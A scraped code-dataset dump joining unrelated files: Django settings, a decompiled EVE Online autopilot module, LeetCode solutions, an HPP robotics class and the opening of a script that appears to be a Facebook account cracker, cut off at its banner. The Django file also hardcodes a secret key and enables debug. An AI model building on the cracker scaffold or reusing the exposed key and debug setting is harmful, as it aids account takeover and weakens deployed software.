SECRET_KEY = '!4b94rixsu(87bj5(s-ch5=3*lox80xnshay3h73yp7s+fryxy'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'api',
'account',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'software_bind.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [template_dir],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'software_bind.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
LOGIN_URL = 'login'
LOGIN_REDIRECT_URL = 'home'
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS=[os.path.join(BASE_DIR,"static"),]
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
| [
"siddhantagarwal99@gmail.com"
] | siddhantagarwal99@gmail.com |
0d7612855c30e129d873683d5f7f339e5fd16d61 | aad164e4efe1d55cc189c35956bfd435b14a0f52 | /eve-8.21.494548/eve/client/script/parklife/autopilot.py | 633cb52208bb534d30fdf32b77f2d3a6d17944d3 | [] | no_license | Pluckyduck/eve | 61cc41fe8fd4dca4fbdcc4761a37bcfeb27ed84f | 9a277707ab1f162c6bd9618faf722c0be3ea93ad | refs/heads/master | 2020-12-28T23:35:29.992875 | 2013-05-06T14:24:33 | 2013-05-06T14:24:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,327 | py | #Embedded file name: c:/depot/games/branches/release/EVE-TRANQUILITY/eve/client/script/parklife/autopilot.py
import util
import destiny
import base
import service
import sys
import uthread
import blue
import log
import localization
import uiconst
from collections import defaultdict
AUTO_NAVIGATION_LOOP_INTERVAL_MS = 2000
class AutoPilot(service.Service):
__guid__ = 'svc.autoPilot'
__exportedcalls__ = {'SetOn': [],
'SetOff': [],
'GetState': []}
__notifyevents__ = ['OnBallparkCall', 'OnSessionChanged', 'OnRemoteMessage']
__dependencies__ = ['michelle', 'starmap']
def __init__(self):
service.Service.__init__(self)
self.updateTimer = None
self.autopilot = 0
self.ignoreTimerCycles = 0
self.isOptimizing = False
self.approachAndTryTarget = None
self.warpAndTryTarget = None
self.__navigateSystemDestinationItemID = None
self.__navigateSystemThread = None
uthread.new(self.UpdateWaypointsThread).context = 'autoPilot::UpdateWaypointsThread'
def UpdateWaypointsThread(self):
blue.pyos.synchro.SleepWallclock(2000)
starmapSvc = sm.GetService('starmap')
waypoints = starmapSvc.GetWaypoints()
if len(waypoints):
starmapSvc.SetWaypoints(waypoints)
def Run(self, memStream = None):
service.Service.Run(self, memStream)
self.StartTimer()
def SetOn(self):
if self.autopilot == 1:
return
self.autopilot = 1
if not sm.GetService('machoNet').GetGlobalConfig().get('newAutoNavigationKillSwitch', False):
self.CancelSystemNavigation()
else:
self.AbortApproachAndTryCommand()
self.AbortWarpAndTryCommand()
sm.ScatterEvent('OnAutoPilotOn')
eve.Message('AutoPilotEnabled')
self.KillTimer()
self.StartTimer()
self.LogNotice('Autopilot Enabled')
def OnSessionChanged(self, isremote, session, change):
self.KillTimer()
self.ignoreTimerCycles = 3
self.StartTimer()
sm.GetService('starmap').UpdateRoute(fakeUpdate=True)
def SetOff(self, reason = ''):
if self.autopilot == 0:
self.KillTimer()
return
sm.ScatterEvent('OnAutoPilotOff')
self.autopilot = 0
if reason == ' - waypoint reached':
eve.Message('AutoPilotWaypointReached')
elif reason == ' - no destination path set':
eve.Message('AutoPilotDisabledNoPathSet')
else:
eve.Message('AutoPilotDisabled')
self.LogNotice('Autopilot Disabled', reason)
def OnRemoteMessage(self, msgID, *args, **kwargs):
if msgID == 'FleetWarp':
self.LogInfo('Canceling auto navigation due to fleet warp detected')
self.CancelSystemNavigation()
def OnBallparkCall(self, functionName, args):
functions = ['GotoDirection', 'GotoPoint']
if args[0] != eve.session.shipid:
return
if not sm.GetService('machoNet').GetGlobalConfig().get('newAutoNavigationKillSwitch', False):
cancelAutoNavigation = False
if self.__navigateSystemDestinationItemID is None:
pass
elif functionName in {'GotoDirection', 'GotoPoint', 'Orbit'}:
cancelAutoNavigation = True
elif functionName == 'FollowBall' and self.__navigateSystemDestinationItemID != args[1]:
cancelAutoNavigation = True
if cancelAutoNavigation:
self.LogInfo('Canceling auto navigation to', self.__navigateSystemDestinationItemID, 'as a respons to OnBallparkCall:', functionName, args)
self.CancelSystemNavigation()
else:
approachAndTryFunctions = ['GotoDirection',
'GotoPoint',
'FollowBall',
'Orbit',
'WarpTo']
warpAndTryFunctions = ['GotoDirection',
'GotoPoint',
'FollowBall',
'Orbit']
if functionName in approachAndTryFunctions:
if functionName != 'FollowBall' or self.approachAndTryTarget != args[1]:
self.AbortApproachAndTryCommand()
if functionName in warpAndTryFunctions:
self.AbortWarpAndTryCommand()
if functionName in functions:
if functionName == 'GotoDirection' and self.gotoCount > 0:
self.gotoCount = 0
self.LogInfo('Autopilot gotocount set to 0')
return
if self.gotoCount == 0:
waypoints = sm.GetService('starmap').GetWaypoints()
if waypoints and util.IsStation(waypoints[-1]):
return
self.SetOff(functionName + str(args))
self.LogInfo('Autopilot stopped gotocount is ', self.gotoCount)
def GetState(self):
return self.autopilot
def Stop(self, stream):
self.KillTimer()
service.Service.Stop(self)
def KillTimer(self):
self.updateTimer = None
def StartTimer(self):
self.gotoCount = 0
self.updateTimer = base.AutoTimer(2000, self.Update)
def Update(self):
if self.autopilot == 0:
self.KillTimer()
return
elif self.ignoreTimerCycles > 0:
self.ignoreTimerCycles = self.ignoreTimerCycles - 1
return
elif not session.IsItSafe():
self.LogInfo('returning as it is not safe')
return
elif not session.rwlock.IsCool():
self.LogInfo("returning as the session rwlock isn't cool")
return
else:
starmapSvc = sm.GetService('starmap')
destinationPath = starmapSvc.GetDestinationPath()
if len(destinationPath) == 0:
self.SetOff(' - no destination path set')
return
elif destinationPath[0] == None:
self.SetOff(' - no destination path set')
return
bp = sm.GetService('michelle').GetBallpark()
if not bp:
return
elif sm.GetService('jumpQueue').IsJumpQueued():
return
ship = bp.GetBall(session.shipid)
if ship is None:
return
elif ship.mode == destiny.DSTBALL_WARP:
return
destID = None
destItem = None
for ballID in bp.balls.iterkeys():
slimItem = bp.GetInvItem(ballID)
if slimItem == None:
continue
if slimItem.groupID == const.groupStargate and destinationPath[0] in map(lambda x: x.locationID, slimItem.jumps):
destID = ballID
destItem = slimItem
break
elif destinationPath[0] == slimItem.itemID:
destID = ballID
destItem = slimItem
break
if destID is None:
return
jumpingToCelestial = not util.IsSolarSystem(destinationPath[0])
theJump = None
if not jumpingToCelestial:
for jump in destItem.jumps:
if destinationPath[0] == jump.locationID:
theJump = jump
break
if theJump is None and not jumpingToCelestial:
return
approachObject = bp.GetBall(destID)
if approachObject is None:
return
if jumpingToCelestial:
jumpToLocationName = cfg.evelocations.Get(destinationPath[0]).name
else:
jumpToLocationName = cfg.evelocations.Get(theJump.locationID).name
shipDestDistance = bp.GetSurfaceDist(ship.id, destID)
if shipDestDistance < const.maxStargateJumpingDistance and not jumpingToCelestial:
if ship.isCloaked:
return
if session.mutating:
self.LogInfo('session is mutating')
return
if session.changing:
self.LogInfo('session is changing')
return
if bp.solarsystemID != session.solarsystemid:
self.LogInfo('bp.solarsystemid is not solarsystemid')
return
if sm.GetService('michelle').GetRemotePark()._Moniker__bindParams != session.solarsystemid:
self.LogInfo('remote park moniker bindparams is not solarsystemid')
return
try:
self.LogNotice('Autopilot jumping from', destID, 'to', theJump.toCelestialID, '(', jumpToLocationName, ')')
sm.GetService('sessionMgr').PerformSessionChange('autopilot', sm.GetService('michelle').GetRemotePark().CmdStargateJump, destID, theJump.toCelestialID, session.shipid)
eve.Message('AutoPilotJumping', {'what': jumpToLocationName})
sm.ScatterEvent('OnAutoPilotJump')
self.ignoreTimerCycles = 5
except UserError as e:
if e.msg == 'SystemCheck_JumpFailed_Stuck':
self.SetOff()
raise
elif e.msg.startswith('SystemCheck_JumpFailed_'):
eve.Message(e.msg, e.dict)
elif e.msg == 'NotCloseEnoughToJump':
park = sm.GetService('michelle').GetRemotePark()
park.CmdSetSpeedFraction(1.0)
shipui = uicore.layer.shipui
if shipui.isopen:
shipui.SetSpeed(1.0)
park.CmdFollowBall(destID, 0.0)
self.LogWarn("Autopilot: I thought I was close enough to jump, but I wasn't.")
sys.exc_clear()
self.LogError('Autopilot: jumping to ' + jumpToLocationName + ' failed. Will try again')
self.ignoreTimerCycles = 5
except:
sys.exc_clear()
self.LogError('Autopilot: jumping to ' + jumpToLocationName + ' failed. Will try again')
self.ignoreTimerCycles = 5
return
elif jumpingToCelestial and util.IsStation(destID) and shipDestDistance < const.maxDockingDistance:
if not sm.GetService('machoNet').GetGlobalConfig().get('newAutoNavigationKillSwitch', False):
if self.__navigateSystemDestinationItemID != destID:
if shipDestDistance > 2500:
sm.GetService('audio').SendUIEvent('wise:/msg_AutoPilotApproachingStation_play')
sm.GetService('menu').Dock(destID)
self.ignoreTimerCycles = 5
else:
if shipDestDistance > 2500 and self.approachAndTryTarget != destID:
sm.GetService('audio').SendUIEvent('wise:/msg_AutoPilotApproachingStation_play')
sm.GetService('menu').Dock(destID)
return
elif shipDestDistance < const.minWarpDistance:
if ship.mode == destiny.DSTBALL_FOLLOW and ship.followId == destID:
return
self.CancelSystemNavigation()
park = sm.GetService('michelle').GetRemotePark()
park.CmdSetSpeedFraction(1.0)
shipui = uicore.layer.shipui
if shipui.isopen:
shipui.SetSpeed(1.0)
park.CmdFollowBall(destID, 0.0)
eve.Message('AutoPilotApproaching')
if not (jumpingToCelestial and util.IsStation(destID)):
sm.GetService('audio').SendUIEvent('wise:/msg_AutoPilotApproaching_play')
self.LogInfo('Autopilot: approaching')
self.ignoreTimerCycles = 2
return
try:
sm.GetService('space').WarpDestination(destID, None, None)
sm.GetService('michelle').GetRemotePark().CmdWarpToStuffAutopilot(destID)
eve.Message('AutoPilotWarpingTo', {'what': jumpToLocationName})
if jumpingToCelestial:
if util.IsStation(destID):
sm.GetService('audio').SendUIEvent('wise:/msg_AutoPilotWarpingToStation_play')
self.LogInfo('Autopilot: warping to celestial object', destID)
else:
sm.GetService('audio').SendUIEvent('wise:/msg_AutoPilotWarpingTo_play')
self.LogInfo('Autopilot: warping to gate')
sm.ScatterEvent('OnAutoPilotWarp')
self.ignoreTimerCycles = 2
except UserError as e:
sys.exc_clear()
item = sm.GetService('godma').GetItem(session.shipid)
if item.warpScrambleStatus > 0:
self.SetOff('Autopilot cannot warp while warp scrambled.')
if 'WarpDisrupted' in e.msg:
self.SetOff('Autopilot cannot warp while warp scrambled by bubble.')
except Exception as e:
self.SetOff('Unknown error')
return
def NavigateSystemTo(self, itemID, interactionRange, commandFunc, *args, **kwargs):
self.LogInfo('Navigate to item', itemID, 'range', interactionRange, 'and execute', commandFunc)
self.__navigateSystemDestinationItemID = itemID
self.__navigateSystemThread = base.AutoTimer(50, self.__NavigateSystemTo, itemID, interactionRange, commandFunc, *args, **kwargs)
def CancelSystemNavigation(self):
self.LogInfo('Cancel system navigation')
self.__navigateSystemDestinationItemID = None
self.__navigateSystemThread = None
self.AbortApproachAndTryCommand()
self.AbortWarpAndTryCommand()
def __NavigateSystemTo(self, itemID, interactionRange, commandFunc, *args, **kwargs):
try:
if self.InWarp():
pass
elif self.InInteractionRange(itemID, interactionRange) and not self.IsCloaked():
self.LogInfo('System navigation: at target location. Triggering action')
try:
commandFunc(*args, **kwargs)
except UserError:
raise
finally:
self.CancelSystemNavigation()
elif self.InWarpRange(itemID):
self.LogInfo('System navigation: warping to target', itemID, interactionRange)
sm.GetService('menu').WarpToItem(itemID, warpRange=const.minWarpEndDistance, cancelAutoNavigation=False)
elif self.IsApproachable(itemID):
sm.GetService('menu').Approach(itemID, cancelAutoNavigation=False)
else:
self.LogInfo('Unable to resolve the proper navigation action. Aborting.', itemID, interactionRange, commandFunc)
self.CancelSystemNavigation()
if self.__navigateSystemThread:
self.__navigateSystemThread.interval = AUTO_NAVIGATION_LOOP_INTERVAL_MS
except UserError as e:
self.LogInfo('User error detected', e.msg, itemID, interactionRange, commandFunc)
raise
except:
self.LogError('Problem while navigating system', itemID, interactionRange, commandFunc)
log.LogException(channel=self.__guid__)
def IsApproachable(self, itemID):
destBall = self.michelle.GetBall(itemID)
if destBall is not None and destBall.surfaceDist < const.minWarpDistance:
return True
return False
def InInteractionRange(self, itemID, interactionRange):
destBall = self.michelle.GetBall(itemID)
if destBall is not None and destBall.surfaceDist < interactionRange:
return True
return False
def InWarp(self):
shipBall = self.michelle.GetBall(session.shipid)
if shipBall is not None and shipBall.mode == destiny.DSTBALL_WARP:
return True
return False
def InWarpRange(self, itemID):
destBall = self.michelle.GetBall(itemID)
if destBall is not None and destBall.surfaceDist > const.minWarpDistance:
return True
return False
def IsCloaked(self):
shipBall = self.michelle.GetBall(session.shipid)
if shipBall is not None:
return bool(shipBall.isCloaked)
return False
def WarpAndTryCommand(self, id, cmdMethod, args, interactionRange):
bp = sm.StartService('michelle').GetRemotePark()
if not bp:
return
if sm.StartService('space').CanWarp() and self.warpAndTryTarget != id:
self.approachAndTryTarget = None
self.warpAndTryTarget = id
try:
michelle = sm.StartService('michelle')
shipBall = michelle.GetBall(session.shipid)
if shipBall is None:
return
if shipBall.mode != destiny.DSTBALL_WARP:
bp.CmdWarpToStuff('item', id)
sm.StartService('space').WarpDestination(id, None, None)
while self.warpAndTryTarget == id and shipBall.mode != destiny.DSTBALL_WARP:
blue.pyos.synchro.SleepWallclock(500)
while shipBall.mode == destiny.DSTBALL_WARP:
blue.pyos.synchro.SleepWallclock(500)
counter = 3
while self.warpAndTryTarget == id and counter > 0:
destBall = michelle.GetBall(id)
if not destBall or destBall.surfaceDist > const.minWarpDistance:
break
destBall.GetVectorAt(blue.os.GetSimTime())
if destBall.surfaceDist < interactionRange:
cmdMethod(*args)
break
blue.pyos.synchro.SleepWallclock(500)
counter -= 1
finally:
if self.warpAndTryTarget == id:
self.warpAndTryTarget = None
def ApproachAndTryCommand(self, id, cmdMethod, args, interactionRange):
bp = sm.StartService('michelle').GetRemotePark()
if not bp:
return
if self.approachAndTryTarget != id and not self.warpAndTryTarget:
self.warpAndTryTarget = None
self.approachAndTryTarget = id
localbp = sm.StartService('michelle').GetBallpark()
if not localbp:
return
try:
sm.GetService('menu').Approach(id)
michelle = sm.StartService('michelle')
while self.approachAndTryTarget == id:
ball = localbp.GetBall(id)
if not ball:
break
ball.GetVectorAt(blue.os.GetSimTime())
shipBall = localbp.GetBall(session.shipid)
if ball.surfaceDist < interactionRange and not shipBall.isCloaked:
cmdMethod(*args)
break
blue.pyos.synchro.SleepWallclock(500)
finally:
if self.approachAndTryTarget == id:
self.approachAndTryTarget = False
def AbortApproachAndTryCommand(self, nextID = None):
if nextID != self.approachAndTryTarget:
self.approachAndTryTarget = None
self.CancelSystemNavigation()
def AbortWarpAndTryCommand(self, nextID = None):
if nextID != self.warpAndTryTarget:
self.warpAndTryTarget = None
self.CancelSystemNavigation()
def OptimizeRoute(self, *args):
if self.isOptimizing:
return
try:
self.isOptimizing = True
starmapSvc = sm.GetService('starmap')
waypoints = list(starmapSvc.GetWaypoints())
originalWaypointsLen = len(waypoints)
isReturnTrip = False
for idx in reversed(xrange(len(waypoints))):
if waypoints[idx] == eve.session.solarsystemid2:
del waypoints[idx]
isReturnTrip = True
break
solarSystemToStations = defaultdict(list)
for i, waypoint in enumerate(waypoints):
if util.IsStation(waypoint):
solarSystemID = cfg.stations.Get(waypoint).solarSystemID
solarSystemToStations[solarSystemID].append(waypoint)
waypoints[i] = solarSystemID
waypoints = list(set(waypoints))
if session.solarsystemid2 in waypoints:
waypoints.remove(session.solarsystemid2)
numWaypoints = len(waypoints)
if numWaypoints == 0:
return
msg = None
if numWaypoints > 12:
msg = 'UI/Map/MapPallet/msgOptimizeQuestion1'
elif numWaypoints > 10:
msg = 'UI/Map/MapPallet/msgOptimizeQuestion2'
if msg:
yesNo = eve.Message('AskAreYouSure', {'cons': localization.GetByLabel(msg, numWaypoints=originalWaypointsLen)}, uiconst.YESNO)
if yesNo != uiconst.ID_YES:
return
distance = {}
waypoints.append(eve.session.solarsystemid2)
for fromID in waypoints:
distance[fromID] = {}
for toID in waypoints:
if fromID == toID:
continue
distance[fromID][toID] = sm.GetService('pathfinder').GetJumpCountFromCurrent(toID, fromID)
waypoints.pop()
startTime = blue.os.GetWallclockTimeNow()
prefix = [None]
_push = prefix.append
_pop = prefix.pop
def FindShortestRoute(prefix, distanceSoFar, toID):
distanceTo = distance[toID]
prefix[-1] = toID
shortestDist = shortestRouteSoFar[0]
if len(prefix) < numWaypoints:
_push(None)
for i in indexes:
toID = waypoints[i]
if not toID:
continue
candidateDist = distanceSoFar + distanceTo[toID]
if candidateDist >= shortestDist:
continue
waypoints[i] = None
FindShortestRoute(prefix, candidateDist, toID)
waypoints[i] = toID
_pop()
else:
for i in indexes:
toID = waypoints[i]
if not toID:
continue
candidateDist = distanceSoFar + distanceTo[toID]
if candidateDist < shortestDist:
shortestRouteSoFar[:] = [candidateDist, prefix[:], toID]
shortestDist = candidateDist
shortestRouteSoFar = [999999999, None, None]
indexes = range(len(waypoints))
FindShortestRoute(prefix, 0, eve.session.solarsystemid2)
distance, waypoints, last = shortestRouteSoFar
blue.pyos.synchro.SleepWallclock(1)
endTime = blue.os.GetWallclockTimeNow()
if waypoints is None:
raise UserError('AutoPilotDisabledUnreachable')
waypoints.append(last)
waypointsWithStations = []
for waypoint in waypoints:
if waypoint in solarSystemToStations:
waypointsWithStations.extend(solarSystemToStations[waypoint])
else:
waypointsWithStations.append(waypoint)
if isReturnTrip == True:
sm.GetService('starmap').SetWaypoints(waypointsWithStations + [session.solarsystemid2])
else:
sm.GetService('starmap').SetWaypoints(waypointsWithStations)
finally:
self.isOptimizing = False | [
"ferox2552@gmail.com"
] | ferox2552@gmail.com |
00d487751a336a68638c30b21a13815a2a96c309 | 07ecc53b5be6b1a34914a0e02265e847f3ac1a65 | /Python/Greedy Algorithm/984_Medium_不含AAA或BBB的字符串.py | 22600af30df05dac1d9060917965bf75ff165bad | [] | no_license | JasmineRain/Algorithm | 764473109ad12c051f5337ed6f22b517ed9bff30 | 84d7e11c1a01b1994e04a3ab446f0a35eb3d362a | refs/heads/master | 2023-03-14T00:39:51.767074 | 2021-03-09T12:41:44 | 2021-03-09T12:41:44 | 289,603,630 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,275 | py | class Solution:
def strWithout3a3b(self, a: int, b: int) -> str:
ans = [""] * (a + b)
index = 0
round = 1
ca = a
cb = b
if a >= b:
while ca > 0:
ans[index] = "a"
ca -= 1
index += 3
if index >= (a + b):
index = round
round += 1
while cb > 0:
ans[index] = "b"
cb -= 1
index += 3
if index >= (a + b):
index = round
round += 1
return "".join(ans)
else:
while cb > 0:
ans[index] = "b"
cb -= 1
index += 3
if index >= (a + b):
index = round
round += 1
while ca > 0:
ans[index] = "a"
ca -= 1
index += 3
if index >= (a + b):
index = round
round += 1
return "".join(ans)
if __name__ == "__main__":
S = Solution()
print(S.strWithout3a3b(a=1, b=2))
print(S.strWithout3a3b(a=4, b=1))
print(S.strWithout3a3b(a=1, b=3))
| [
"530781348@qq.com"
] | 530781348@qq.com |
6abcd1cee3f4165bcbb7942b998559d41f8d3cc3 | fe931c53d269cb5b4c6972d4bc55e6890c22ea28 | /Platform.py | 9d25b650364382f733e5607ec37586109fc91f55 | [] | no_license | shuaiwangvu/hpp_course | f696fd508ca1a618011bda5ae7799548d748b37a | 545ada093d77ca4d8f446e4c7fc502f3af2016f5 | refs/heads/master | 2022-04-20T14:26:52.941142 | 2020-03-04T11:15:13 | 2020-03-04T11:15:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,764 | py | # gepetto-viewer-server
# not hpp-manipulation-server
# hppcorbaserver
# -DCMAKE_INSTALL_PREFIX=/home/airobert/HPP/install
from HyQ import HyQ
from Agent import PR2
from Environment import BasicHouse
from Obstacle import Obstacle
from hpp.corbaserver import ProblemSolver
# from hpp.corbaserver.manipulation import ProblemSolver as MProblemSolver, ConstraintGraph
from hpp.gepetto import PathPlayer
from hpp.gepetto import ViewerFactory
# from hpp.gepetto.manipulation import ViewerFactory as MViewerFactory
from hpp.corbaserver.manipulation import robot as METARobot
from time import sleep
class Platform ():
main_agent = None
meta_agent = None
agents = []
# problem solver
ps = None
# path player
pp = None
# view factory
vf = None
# viewer
r = None
env = None
# pp = PathPlayer (rbprmBuilder.client.basic,ls r)
def __init__(self, mainAgentType):
print 'creating a platform with an agent of type: ', mainAgentType
if (mainAgentType == "hyq" or mainAgentType == "HyQ" or mainAgentType == "HYQ"):
self.main_agent = HyQ(self, 1, "main")
elif (mainAgentType == "pr2" or mainAgentType == "PR2"):
self.main_agent = PR2(self, 1, "main")
else:
print 'this type of agent can not be defined yet'
self.ps = ProblemSolver (self.main_agent)
self.vf = ViewerFactory (self.ps)
self.r = self.vf.createViewer()
self.r(self.main_agent.getCurrentConfig ())
self.agents.append (self.main_agent)
def refreshDisplay(self):
# self.r = self.vf.createViewer()
self.r.computeObjectPosition()
#and finally, set the environment
def setEnvironment(self, env):
self.vf.loadObstacleModel(env.packageName, env.urdfName, env.name)
self.env = env
self.r = self.vf.createViewer()
# self.refreshDisplay()
# this method looks useless so far.....
# def activatePlatform(self):
# self.main_agent.client.problem.selectProblem('0')
# for i in self.agents:
# i.refrechAgent()
def loadAgentView (self, index):
self.ps = self.agents[index -1].ps
self.vf = ViewerFactory (self.ps)
self.r = self.vf.createViewer()
# print '---------------->', len(self.agents[index - 1].init_config)
self.r(self.agents[index - 1].init_config)
self.refreshDisplay()
# self.r.computeObjectPosition()
def playProposedPath(self, index):
self.loadAgentView(index)
a = self.agents[index - 1]
for t in range (a.proposed_plan_length):
self.r(a.configOfProposedPlanAtTime(t))
sleep(0.02)
def playAllPath(self):
max_time = 0
for a in self.agents:
if a.proposed_plan_length > max_time:
max_time = a.proposed_plan_length
for t in range(max_time):
print 'time is ', t
for i in range(len(self.agents)):
a = self.agents[i]
if a.proposed_plan_length > t:
print 'agent ', a.index,
self.loadAgentView(i)
# and then set the agent to its current configuration
self.r(a.configOfProposedPlanAtTime(t))
# sleep(0.003)
def checkAllPath(self):
max_time = 0
for a in self.agents:
if a.proposed_plan_length > max_time:
max_time = a.proposed_plan_length
for t in range(max_time):
print 'time is ', t
for i in range(len(self.agents)):
a = self.agents[i]
if a.proposed_plan_length > t:
print 'agent ', a.index,
self.loadAgentView(i)
# and then set the agent to its current configuration
self.r(a.configOfProposedPlanAtTime(t))
# (result, msg) = a.isConfigValid(a.configOfProposedPlanAtTime(t))
# if not result:
# return False
# sleep(0.003)
def playAgentPath(self, cl):
self.pp = PathPlayer (cl, self.r)
self.pp.setSpeed(4) # comment this out if you are not debugging
self.pp.displayPath(0, color = [0.3, 0.7, 0.6, 1], jointName='base_joint_xy')
self.pp(0)
def addAgent(self, agt):
self.agents.append(agt) | [
"ai.robert.wangshuai@gmail.com"
] | ai.robert.wangshuai@gmail.com |
90f9c2b7cba886de306796566f399f9f8ad054ff | 033d4f3fb539425f12a7f951e011f7696f7c909f | /TigerNuts/asgi.py | 413278ae30f335a908a31b7e7499a439a376e677 | [] | no_license | hristo-grudev/TigerNuts | 07413edd57a3b78e09b7ba3355f0ecf4497573d4 | d328842c0454890fc0d3d7712d2c9bc272da8b42 | refs/heads/main | 2023-03-07T19:16:22.175112 | 2021-02-24T09:51:22 | 2021-02-24T09:51:22 | 328,690,018 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | """
ASGI config for TigerNuts project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'TigerNuts.settings')
application = get_asgi_application()
| [
"hristo.grudev@ADPVT.com"
] | hristo.grudev@ADPVT.com |
dca261af830e2fc00b8bbeb22fa8e92af90f3b9d | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_oppressors.py | 794179fbab874c62e6c90e5f1fc1331b1f5c3cc8 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 234 | py |
#calss header
class _OPPRESSORS():
def __init__(self,):
self.name = "OPPRESSORS"
self.definitions = oppressor
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['oppressor']
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
c3f8c9326a98788d32a1dd6f6cb2abac77136527 | 7a550d2268bc4bc7e2fec608ffb1db4b2e5e94a0 | /1301-1400/1342-Number of Steps to Reduce a Number to Zero/1342-Number of Steps to Reduce a Number to Zero.py | ff2024f01916125f617a9207453ff82c87002008 | [
"MIT"
] | permissive | jiadaizhao/LeetCode | be31bd0db50cc6835d9c9eff8e0175747098afc6 | 4ddea0a532fe7c5d053ffbd6870174ec99fc2d60 | refs/heads/master | 2021-11-05T04:38:47.252590 | 2021-10-31T09:54:53 | 2021-10-31T09:54:53 | 99,655,604 | 52 | 28 | MIT | 2020-10-02T12:47:47 | 2017-08-08T05:57:26 | C++ | UTF-8 | Python | false | false | 239 | py | class Solution:
def numberOfSteps (self, num: int) -> int:
step = 0
while num != 0:
if num & 1:
num -= 1
else:
num >>= 1
step += 1
return step
| [
"jiadaizhao@gmail.com"
] | jiadaizhao@gmail.com |
adeddb66f2e1571cadf7716696856f2eff28564b | f5d98c19591dd692f784f909e245ce527062c87d | /zeroboy.py | dfc1f9c9cb7d31278884b4bc19ef84e17a243fd8 | [] | no_license | hum4-munga4/hum4 | 2644feaf7430112432aab9399d74e617d1004d9b | b4f95dcae8b774010bb68223407eda7a18eeb1ad | refs/heads/master | 2022-04-17T14:08:02.703666 | 2020-04-18T13:44:28 | 2020-04-18T13:44:28 | 256,763,845 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,397 | py | #!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """
\033[1;91m🄷🄰🅁🅂🄷🄻🄴🅆🄰🄽🅈
\033[1;91m🄷🅄🄼4-🄼🅄🄽🄶🄰4
\033[1;97m===========================
\033[1;96mAuthor \033[1;93m:Harsh \033[1;92mHarsh Lewany
\033[1;96mInstagram \033[1;93m: \033[1;FlowHarsh
\033[1;96mFacebook \033[1;93m: \033[1; Aahilrna4072
\033[1;96mGithub \033[1;93m: \033[1;92mhttps://github.com/Therana/zero
\033[1;91m======================================="""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[●] \x1b[1;93mSedang masuk \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print "\033[1;96m ============================================================="
print """\033[1;91m=======================================
